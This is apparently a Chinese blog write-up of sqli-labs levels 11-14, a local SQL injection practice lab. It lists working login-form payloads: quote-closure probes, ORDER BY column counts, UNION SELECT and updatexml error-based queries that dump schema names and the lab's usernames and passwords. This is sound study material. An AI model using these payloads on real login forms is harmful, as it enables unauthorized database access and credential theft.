zoukankan      html  css  js  c++  java

  • sqli-11-14关-2020-04-17

    十一关

    http://127.0.0.1/sqli/Less-11/

     看到这个页面,添个admin,admin在说.

     什么情况,竟然出现这个结果.那么在乱填一个.

     

     明显不一样了.那么我还是抓包处理一下.

    抓到包,我们可以尝试重发测试.

     看到数据库报错,第一个时间想到这点有漏洞.

    uname=xxeyuki' order by 2#&passwd=xxxxxxx&submit=Submit  #得知有2列数

    uname=xxeyuki' union select 1,database()#&passwd=xxxxxxx&submit=Submit  #得到数据库security

    uname=xxeyuki' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'#&passwd=xxxxxxx&submit=Submit  #得到数据表emails,referers,uagents,users

    uname=xxeyuki' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#&passwd=xxxxxxx&submit=Submit  #得到数据表users的字段

    user_id,first_name,last_name,user,password,avatar,id,username,password,level,id,username,password,id,username,password

    uname=xxeyuki' union select 1,group_concat(username,"~",password) from users#&passwd=xxxxxxx&submit=Submit  #数据表users的username和password的数据

    Dumb~Dumb,Angelina~I-kill-you,Dummy~p@ssword,secure~crappy,stupid~stupidity,superman~genious,batman~mob!le,admin~admin,admin1~admin1,admin2~admin2,admin3~admin3,dhakkan~dumbo,admin4~admin4

    第十二关

    直接说这么找注入点和闭合点

    uname=xxeyuki'&passwd=33yuki&submit=Submit  #单引号没有任何反应

    uname=xxeyuki"&passwd=33yuki&submit=Submit  #有反应了,很明显的数据库报错。

     ")这闭合好像非常明显

    uname=xxeyuki") order by 3#&passwd=33yuki&submit=Submit  #3报错,2没有报错 确定列数2

    uname=xxeyuki") union select 1,database()#&passwd=33yuki&submit=Submit  #得到数据库security

    uname=xxeyuki") union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'#&passwd=33yuki&submit=Submit  #数据表 users

    uname=xxeyuki") union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#&passwd=33yuki&submit=Submit  #字段username,password

    uname=xxeyuki") union select 1,group_concat(username,password) from users#&passwd=33yuki&submit=Submit  #用户名和密码数据

     十三关

    uname=admin'&passwd=admin&submit=Submit  #看到这个弹出这个我就大概确定闭合是')

    ou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'admin') LIMIT 0,1' at line 1

    uname=admin') order by 2#&passwd=admin&submit=Submit  #确定列数为2

    uname=admin') union select 1,(updatexml(1,concat(0x7e,(select database()),0x7e),1))#&passwd=admin&submit=Submit  #爆数据库

    uname=admin') union select 1,(updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1))#&passwd=admin&submit=Submit  #爆数据表

    uname=admin') union select 1,(updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1))#&passwd=admin&submit=Submit  #爆字段,无语只能17个字符

    uname=admin') union select 1,(updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 3,1),0x7e),1))#&passwd=admin&submit=Submit  #只能一个个爆了

    uname=admin') union select 1,(updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 4,1),0x7e),1))#&passwd=admin&submit=Submit  #密码字段

    uname=admin') union select 1,(updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 7,1),0x7e),1))#&passwd=admin&submit=Submit  #用户名

    uname=admin') union select 1,(updatexml(1,concat(0x7e,(select username from users limit 7,1),0x7e),1))#&passwd=admin&submit=Submit  #用户名

    uname=admin') union select 1,(updatexml(1,concat(0x7e,(select password from users limit 7,1),0x7e),1))#&passwd=admin&submit=Submit  #密码

    十四关

    uname=admin" union select 1,(updatexml(1,concat(0x7e,(select database()),0x7e),1))#&passwd=admin&submit=Submit  #爆数据库

    uname=admin" union select 1,(updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x7e),1))#&passwd=admin&submit=Submit  #爆数据表

    uname=admin" union select 1,(updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 7,1),0x7e),1))#&passwd=admin&submit=Submit  #爆用户名

    uname=admin" union select 1,(updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 4,1),0x7e),1))#&passwd=admin&submit=Submit  #爆密码

    uname=admin" union select 1,(updatexml(1,concat(0x7e,(select username from users limit 1,1),0x7e),1))#&passwd=admin&submit=Submit

    uname=admin" union select 1,(updatexml(1,concat(0x7e,(select password from users limit 1,1),0x7e),1))#&passwd=admin&submit=Submit

      
  • 相关阅读:
    白话机器学习
    Intersecting Lines POJ
    Segments POJ
    Toy Storage POJ
    TOYS POJ
    2019CCPC秦皇岛赛区1004 Decimal
    Django 基本使用
    HTML页面布局
    微擎上传视频,音频,图片提示格式不支持
    微擎应用名称图标的修改
  • 原文地址:https://www.cnblogs.com/llcn/p/12717807.html
Copyright © 2011-2022 走看看